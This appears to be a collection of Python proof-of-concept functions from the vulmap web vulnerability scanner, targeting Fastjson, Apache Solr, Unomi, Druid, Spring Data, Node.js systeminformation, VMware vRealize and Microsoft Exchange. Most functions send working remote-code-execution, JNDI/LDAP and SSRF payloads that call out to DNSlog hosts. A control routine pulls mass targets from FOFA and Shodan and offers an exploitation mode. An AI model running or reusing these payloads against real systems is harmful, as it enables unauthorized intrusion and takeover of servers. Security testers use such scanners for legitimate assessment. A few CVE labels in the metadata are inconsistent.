def fastjson_1224_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Fastjson: 1.2.24" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_payd"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞" self.vul_info["vul_numb"] = "CVE-2017-18349" self.vul_info["vul_apps"] = "Fastjson" self.vul_info["vul_date"] = "2017-03-15" self.vul_info["vul_vers"] = "<= 1.2.24" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "Fastjson中的parseObject允许远程攻击者通过精心制作的JSON请求执行任意代码" self.vul_info["cre_date"] = "2021-01-20" self.vul_info["cre_auth"] = "zhzyker" headers = { 'User-Agent': self.ua, 'Content-Type': "application/json", 'Connection': 'close' } md = dns_request() dns = md data = { "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://" + dns + "//Exploit", "autoCommit": True } } data = json.dumps(data) try: try: request = requests.post(self.url, data=data, headers=headers, timeout=self.timeout, verify=False) self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') except: pass if dns_result(md): self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] " self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] " verify.scan_print(self.vul_info) else: verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def fastjson(self, webapps_identify, url): name = "Fastjson" Identify.identify_prt(name) dns = dns_request() payload1 = '{"e":{"@type":"java.net.Inet4Address","val":"%s"}}' %dns payload2 = '{"@type":"java.net.Inet4Address","val":"%s"}' %dns payload3 = '{{"@type":"java.net.URL","val":"http://%s"}:"x"}' %dns payload4 = '{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"%s"}}""}' %dns payload5 = '{"a":"' headers = {'User-Agent': self.ua, 'Content-Type': "application/json", 'Connection': 'close'} try: try: request = requests.post(url, data=payload5, headers=headers, timeout=self.timeout, verify=False) except: pass if r"nested exception is com.alibaba.fastjson.JSONException:" in request.text: if r"application/json" == request.headers['Content-Type']: webapps_identify.append("fastjson") elif r"application/json" in request.headers['Content-Type']: webapps_identify.append("fastjson") else: requests.post(url, data=payload1, headers=headers, timeout=self.timeout, verify=False) requests.post(url, data=payload2, headers=headers, timeout=self.timeout, verify=False) requests.post(url, data=payload3, headers=headers, timeout=self.timeout, verify=False) requests.post(url, data=payload4, headers=headers, timeout=self.timeout, verify=False) if dns_result(dns): webapps_identify.append("fastjson") webapps_identify.append("fastjson [" + dns + "]") except Exception as error: pass
def cve_2020_13942_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Unomi: CVE-2020-13942" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = self.payload_cve_2020_13942.replace( "RECOMMAND", "whoami") self.vul_info["vul_name"] = "Apache Unomi remote code execution" self.vul_info["vul_numb"] = "CVE-2020-13942" self.vul_info["vul_apps"] = "Unomi" self.vul_info["vul_date"] = "2020-11-23" self.vul_info["vul_vers"] = "< 1.5.2" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码," \ "漏洞对应编号为CVE-2020-11975,而CVE-2020-13942漏洞是对CVE-2020-11975漏洞的补丁绕过," \ "攻击者绕过补丁检测的黑名单,发送恶意请求,在服务器执行任意代码。" self.vul_info["cre_date"] = "2021-01-28" self.vul_info["cre_auth"] = "zhzyker" md = dns_request() cmd = "ping " + md self.payload = self.payload_cve_2020_13942.replace("RECOMMAND", cmd) self.headers = { 'User-Agent': self.ua, 'Accept': '*/*', 'Connection': 'close', 'Content-Type': 'application/json' } try: req = requests.post(self.url + "/context.json", data=self.payload, headers=self.headers, timeout=self.timeout, verify=False) if dns_result(md): self.vul_info["vul_data"] = dump.dump_all(req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[dns] [cmd:" + cmd + "]" else: rep = list( json.loads(req.text) ["trackedConditions"])[0]["parameterValues"]["pagePath"] if r"/tracker/" in rep: self.vul_info["vul_data"] = dump.dump_all(req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info["prt_info"] = "[maybe]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_27905_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Solr: CVE-2021-27905" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Apache Solr Replication handler SSRF" self.vul_info["vul_numb"] = "CVE-2021-27905" self.vul_info["vul_apps"] = "Solr" self.vul_info["vul_date"] = "2021-04-14" self.vul_info["vul_vers"] = "7.0.0-7.7.3, 8.0.0-8.8.1" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "SSRF" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。漏洞产生在 ReplicationHandler 中的 masterUrl 参数( leaderUrl 参数)可指派另一个 Solr 核心上的 ReplicationHandler 讲索引数据复制到本地核心上。成功利用此漏洞可造成服务端请求伪造漏洞。" self.vul_info["cre_auth"] = "zhzyker" core_name = None dns = dns_request() url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json" try: request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False) try: core_name = list(json.loads(request.text)["status"])[0] except: pass payload = "/solr/re_core_name/replication?command=fetchindex&masterUrl" \ "=http://re_dns_domain/&wt=json&httpBasicAuthUser="******"&httpBasicAuthPassword="******"re_core_name", core_name).replace("re_dns_domain", dns) url_ssrf = urljoin(self.url, payload) r = requests.get(url_ssrf, headers=self.headers, timeout=self.timeout, verify=False) if dns in dns_result(dns): self.vul_info["vul_payd"] = url_ssrf self.vul_info["vul_data"] = dump.dump_all(r).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[ssrf] [dns] [corename: " + self.url + "/solr/" + core_name + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def fastjson_1262_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Fastjson: 1.2.62" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_payd"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞" self.vul_info["vul_numb"] = "null" self.vul_info["vul_apps"] = "Fastjson" self.vul_info["vul_date"] = "2019-10-07" self.vul_info["vul_vers"] = "<= 1.2.62" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "官方暂未发布针对此漏洞的修复版本,开启了autoType功能的受影响用户可通过关闭autoType来规避风险" \ "(autoType功能默认关闭),另建议将JDK升级到最新版本。" self.vul_info["cre_date"] = "2021-01-21" self.vul_info["cre_auth"] = "zhzyker" headers = {'User-Agent': self.ua, 'Content-Type': "application/json"} md = dns_request() dns = md data = { "@type": "org.apache.xbean.propertyeditor.JndiConverter", "AsText": "ldap://" + dns + "//exploit" } data = json.dumps(data) try: try: request = requests.post(self.url, data=data, headers=headers, timeout=self.timeout, verify=False) self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') except: pass if dns_result(md): self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] " self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] " verify.scan_print(self.vul_info) else: verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_25646_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Druid: CVE-2021-25646" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Apache Druid 远程代码执行漏洞" self.vul_info["vul_numb"] = "CVE-2021-25646" self.vul_info["vul_apps"] = "Druid" self.vul_info["vul_date"] = "2021-02-01" self.vul_info["vul_vers"] = "< 0.20.1" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行漏洞" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。" \ "此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中," \ "经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。" \ "攻击者可直接构造恶意请求执行任意代码,控制服务器。" self.vul_info["cre_date"] = "2021-02-03" self.vul_info["cre_auth"] = "zhzyker" url = urljoin(self.url, "/druid/indexer/v1/sampler") headers = { 'Content-Type': 'application/json', 'User-Agent': self.ua, 'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2', 'Connection': 'keep-alive' } md = dns_request() cmd = "ping " + md data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd) try: request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) if dns_result(md): self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["vul_payd"] = data self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[dns] [rce] [cmd: " + cmd + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_21975_poc(self): self.threadLock.acquire() self.vul_info[ "prt_name"] = "VMware vRealize Operations Manager: CVE-2021-21975" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info[ "vul_name"] = "VMware vRealize Operations Manager API SSRF" self.vul_info["vul_numb"] = "CVE-2021-21972" self.vul_info["vul_apps"] = "Vmware" self.vul_info["vul_date"] = "2021-03-31" self.vul_info["vul_vers"] = "<= 8.3.0" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "SSRF" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "攻击者通过访问vRealize Operations Manager API传递特定的参数到服务器端进行请求伪造攻击" self.vul_info["cre_date"] = "2021-04-01" self.vul_info["cre_auth"] = "zhzyker" try: headers = { "User-Agent": self.ua, "Content-Type": "application/json;charset=UTF-8" } dns = dns_request() data = '["' + dns + '"]' url = urljoin(self.url, "/casa/nodes/thumbprints") res = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) if dns_result(dns): self.vul_info["vul_data"] = dump.dump_all(res).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = data self.vul_info["prt_info"] = "[ssrf] [dns:" + dns + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_21315_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Node.JS: CVE-2021-21315" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Node.JS Command Injection" self.vul_info["vul_numb"] = "CVE-2021-21315" self.vul_info["vul_apps"] = "Node.JS" self.vul_info["vul_date"] = "2021-02-25" self.vul_info["vul_vers"] = "Systeminformation < 5.3.1" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Command Injection" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "CVE-2021-21315 Node.JS OS sanitize service Parameters Command Injection" self.vul_info["cre_date"] = "2021-03-04" self.vul_info["cre_auth"] = "zhzyker" headers = { "User-agent": self.ua, "Connection": "close" } md = dns_request() cmd = "ping%20" + md payload = "/api/getServices?name[]=$(RECOMMAND)".replace("RECOMMAND", cmd) url = self.url + payload try: try: req = requests.get(url, headers=headers, timeout=3, verify=False) r = dump.dump_all(req).decode('utf-8', 'ignore') except: r = "null" pass if dns_result(md): self.vul_info["vul_data"] = r self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = payload self.vul_info["prt_info"] = "[dns] [payload:" + url + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2018_1273_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Spring Data: CVE-2018-1273" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Spring Data Commons 远程命令执行漏洞" self.vul_info["vul_numb"] = "CVE-2018-1273" self.vul_info["vul_apps"] = "Spring" self.vul_info["vul_date"] = "2018-04-11" self.vul_info["vul_vers"] = "1.13 - 1.13.10, 2.0 - 2.0.5" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程命令执行漏洞" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Spring Data Commons组件中存在远程代码执行漏洞," \ "攻击者可构造包含有恶意代码的SPEL表达式实现远程代码攻击,直接获取服务器控制权限。" self.vul_info["cre_date"] = "2021-01-26" self.vul_info["cre_auth"] = "zhzyker" md = dns_request() cmd = "ping " + md payload = 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("' + cmd + '")]=&password=&repeatedPassword='******'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = payload self.vul_info["prt_info"] = "[dns] [rce] [payload: " + payload + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def control_options(args): # 选项控制,用于处理所有选项 delay = globals.get_value("DELAY") # 获取全局变量延时时间DELAY now_warn = now.timed(de=delay) + color.red_warn() if args.socks: proxy_set(args.socks, "socks") # proxy support socks5 http https elif args.http: proxy_set(args.http, "http") # proxy support socks5 http https if args.list is False: # 判断是否显示漏洞列表 print(now.timed(de=0) + color.yel_info() + color.yellow(" List of supported vulnerabilities")) print(vul_list()) if args.thread_num != 10: # 判断是否为默认线程 print(now.timed(de=0) + color.yel_info() + color.yellow(" Custom thread number: " + str(args.thread_num))) if args.vul is not None: # 判断是否-v进行漏洞利用 args.mode = "exp" # 若进行漏洞利用修改模式为exp if args.debug is False: # 判断是否开启--debug功能 print(now.timed(de=delay) + color.yel_info() + color.yellow(" Using debug mode to echo debug information")) globals.set_value("DEBUG", "debug") # 设置全局变量DEBUG #ceye_api() # 测试ceye连接性 if dns_request(): # 初始化dnslog, 并判断是否可用 pass else: print(now_warn + color.red(" Dnslog platform (hyuga.co dnslog.cn ceye.io) is not available")) if args.O_TEXT: # 判断是否text输出 if os.path.isfile(args.O_TEXT): # 判断text输出文件是否冲突 print(now.timed(de=delay) + color.red_warn() + color.red(" The json file: [" + args.O_TEXT + "] already exists")) exit(0) if args.O_JSON: # 判断是否json输出 if os.path.isfile(args.O_JSON): # 判断json输出文件是否冲突 print(now.timed(de=delay) + color.red_warn() + color.red(" The json file: [" + args.O_JSON + "] already exists")) exit(0) if args.mode is None or args.mode == "poc": # 判断是否进入poc模式 if args.url is not None and args.file is None: # 判断是否为仅-u扫描单个URL args.url = url_check(args.url) # 处理url格式 if survival_check(args.url) == "f": # 检查目标存活状态 print(now.timed(de=0) + color.red_warn() + color.red(" Survival check failed: " + args.url)) exit(0) # 单个url时存活失败就退出 print(now.timed(de=0) + color.yel_info() + color.cyan(" Start scanning target: " + args.url)) if args.app is None: # 判断是否扫描扫描全部webapps globals.set_value("RUNALLPOC", True) # 扫描单个URL并且所有webapps时RUNALLPOC=True core.control_webapps("url", args.url, args.app, "poc") else: # 否则扫描单个webapps core.control_webapps("url", args.url, args.app, "poc") elif args.file is not None and args.url is None: # 判断是否为仅-f批量扫描文件 if os.path.isfile(args.file): # 判断批量目标文件是否存在 print(now.timed(de=0) + color.yel_info() + color.cyan(" Start batch scanning target: " + args.file)) else: # 没有文件错误并退出 print(now.timed(de=0) + color.red_warn() + color.red(" Not found target file: " + args.file)) exit(0) if args.app is None: # 判断是否扫描扫描全部webapps globals.set_value("RUNALLPOC", "FILE") # 批量扫描URL并且所有webapps时RUNALLPOC="FILE" core.control_webapps("file", args.file, args.app, "poc") else: # 否则批量扫描单个webapps core.control_webapps("file", args.file, args.app, "poc") elif args.url is None and args.file is None and args.fofa is not None: # 调用fofa api print(now.timed(de=0) + color.yel_info() + color.yellow(" Use fofa api to search [" + args.fofa + "] and start scanning")) if r"xxxxxx" in globals.get_value("fofa_key"): # 使用fofa api之前判断fofa信息是否正确 print(now.timed(de=0) + color.red_warn() + color.red(" Check fofa email is xxxxxx Please replace key and email")) print(now.timed(de=0) + color.red_warn() + color.red(" Go to https://fofa.so/user/users/info find key and email")) print(now.timed(de=0) + color.red_warn() + color.red(" How to use key and email reference https://github.com/zhzyker/vulmap")) exit(0) else: print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa email: " + globals.get_value("fofa_email"))) print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa key: " + globals.get_value("fofa_key"))) fofa_list = fofa(args.fofa, args.size) # 调用fofa api拿到目标数组默认100个 if args.app is None: # 判断是否扫描扫描全部webapps core.control_webapps("fofa", fofa_list, args.app, "poc") else: core.control_webapps("fofa", fofa_list, args.app, "poc") elif args.url is None and args.file is None and args.shodan is not None: # 调用fofa api 或者 shodan api print(now.timed(de=0) + color.yel_info() + color.yellow(" Use shodan api to search [" + args.shodan + "] and start scanning")) if r"xxxxxx" in globals.get_value("shodan_key"): # 使用shodan api之前判断shodan信息是否正确 print(now.timed(de=0) + color.red_warn() + color.red(" Check shodan key is xxxxxx Please replace key")) print(now.timed(de=0) + color.red_warn() + color.red(" Go to https://account.shodan.io/ find key")) print(now.timed(de=0) + color.red_warn() + color.red(" How to use key reference https://github.com/zhzyker/vulmap")) exit(0) else: print(now.timed(de=0) + color.yel_info() + color.yellow(" Shodan key: " + globals.get_value("shodan_key"))) shodan_list = shodan_api(args.shodan) # 调用shodan api拿到目标数组默认100个 if args.app is None: # 判断是否扫描扫描全部webapps core.control_webapps("shodan", shodan_list, args.app, "poc") else: core.control_webapps("shodan", shodan_list, args.app, "poc") if args.O_TEXT: print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result text saved to: " + args.O_TEXT)) if args.O_JSON: print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result json saved to: " + args.O_JSON)) elif args.mode == "exp": # 漏洞利用模式参数较少 if args.vul is not None and args.url is not None: # 判断是否进入漏洞利用模式 core.control_webapps("url", args.url, args.vul, "exp") else: print(now_warn + color.red(" Options error, -v must specify -u")) else: print(now_warn + color.red(" Options error ... ..."))
def cve_2017_12629_poc(self): self.threadLock.acquire() http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0' self.vul_info["prt_name"] = "Apache Solr: CVE-2017-12629" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_payd"] = self.payload_cve_2017_12629.replace( "RECOMMAND", "whoami") self.vul_info["vul_urls"] = self.url self.vul_info["vul_name"] = "Apache Solr 远程代码执行漏洞" self.vul_info["vul_numb"] = "CVE-2017-12629" self.vul_info["vul_apps"] = "Solr" self.vul_info["vul_date"] = "2017-10-14" self.vul_info["vul_vers"] = "< 7.1.0" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Remote Code Execution" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法" \ "(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。" self.vul_info["cre_auth"] = "zhzyker" core_name = "null" new_core = random_md5() md = dns_request() cmd = "ping " + md payload1 = self.payload_cve_2017_12629.replace( "RECOMMAND", cmd).replace("new_core", new_core) payload2 = '[{"id": "test"}]' url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json" headers_solr1 = { 'Accept': "*/*", 'User-Agent': self.ua, 'Content-Type': "application/json" } headers_solr2 = { 'Host': "localhost", 'Accept-Language': "en", 'User-Agent': self.ua, 'Connection': "close", 'Content-Type': "application/json" } try: request = requests.get(url_core, headers=headers_solr1, timeout=self.timeout, verify=False) try: core_name = list(json.loads(request.text)["status"])[0] except: pass req = requests.post(self.url + "/solr/" + str(core_name) + "/config", data=payload1, headers=headers_solr1, timeout=self.timeout, verify=False) if dns_result(md): self.vul_info["vul_data"] = dump.dump_all(req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[dns] [newcore: " + new_core + "] " else: if request.status_code == 200 and core_name != "null" and core_name is not None: self.vul_info["vul_data"] = dump.dump_all(req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info[ "prt_info"] = "[maybe] [newcore: " + new_core + "] " verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2019_17558_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Solr: CVE-2019-17558" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = self.payload_cve_2019_17558.replace( "RECOMMAND", "whoami") self.vul_info[ "vul_name"] = "Apache Solr Velocity template Remote Code Execution" self.vul_info["vul_numb"] = "CVE-2019-17558" self.vul_info["vul_apps"] = "Solr" self.vul_info["vul_date"] = "2017-10-16" self.vul_info["vul_vers"] = "5.0.0 - 8.3.1" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Remote Code Execution" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "用户可以注入自定义模板,通过Velocity模板语言执行任意命令。" self.vul_info["cre_auth"] = "zhzyker" core_name = None md = dns_request() cmd = "ping " + md payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd) url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json" try: request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False) try: core_name = list(json.loads(request.text)["status"])[0] except: pass url_api = self.url + "/solr/" + str(core_name) + "/config" headers_json = { 'Content-Type': 'application/json', 'User-Agent': self.ua } set_api_data = """ { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } } """ try: r = requests.post(url_api, data=set_api_data, headers=headers_json, timeout=self.timeout, verify=False) req = requests.get(self.url + "/solr/" + str(core_name) + payload_2, headers=self.headers, timeout=self.timeout, verify=False) req = dump.dump_all(req).decode('utf-8', 'ignore') r = dump.dump_all(r).decode('utf-8', 'ignore') except: req = "timeout" r = "timeout" if dns_result(md): self.vul_info["vul_data"] = req self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[dns] [corename: " + self.url + "/solr/" + core_name + " ]" verify.scan_print(self.vul_info) elif self.vul_info[ "prt_resu"] != "PoCSuCCeSS" and core_name is not None: self.vul_info["vul_data"] = r self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info[ "prt_info"] = "[maybe] [corename: " + self.url + "/solr/" + core_name + " ]" verify.scan_print(self.vul_info) else: verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_26855_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Microsoft Exchange: CVE-2021-26855" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Microsoft Exchange Server SSRF" self.vul_info["vul_numb"] = "CVE-2021-26855" self.vul_info["vul_apps"] = "Exchange" self.vul_info["vul_date"] = "2021-03-03" self.vul_info["vul_vers"] = "Exchange Server 2010 2013 2016 2019" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "SSRF" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "Exchange 中身份验证后的任意文件写入漏洞。攻击者可以通过 Exchange 服务器进行身份验证,同时可以利用漏洞将文件写入服务器上的任何路径。也可以通过利用 CVE-2021-26855 SSRF 漏洞或通过破坏合法管理员的凭据来进行身份验证。" self.vul_info["cre_date"] = "2021-03-07" self.vul_info["cre_auth"] = "zhzyker" url = self.url + "/owa/auth/x.js" dns = dns_request() cookie_local = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;" cookie_dns = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;".replace( "localhost", dns) try: headers = { "User-agent": self.ua, "Cookie": cookie_dns, "Connection": "close" } res = requests.get(url, headers=headers, timeout=self.timeout, verify=False) if dns_result(dns): self.vul_info["vul_data"] = dump.dump_all(res).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = headers["Cookie"] self.vul_info["prt_info"] = "[ssrf] [dns] [cookie: " + headers[ "Cookie"] + "]" else: headers = { "User-agent": self.ua, "Cookie": cookie_local, "Connection": "close" } res = requests.get(url, headers=headers, timeout=self.timeout, verify=False) if res.status_code == 500 and "NegotiateSecurityContext failed with for host" in res.text: if r"TargetUnknown" in res.text and r"localhost" in res.text: self.vul_info["vul_data"] = dump.dump_all(res).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info["vul_payd"] = headers["Cookie"] self.vul_info[ "prt_info"] = "[ssrf] [maybe] [cookie: " + headers[ "Cookie"] + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()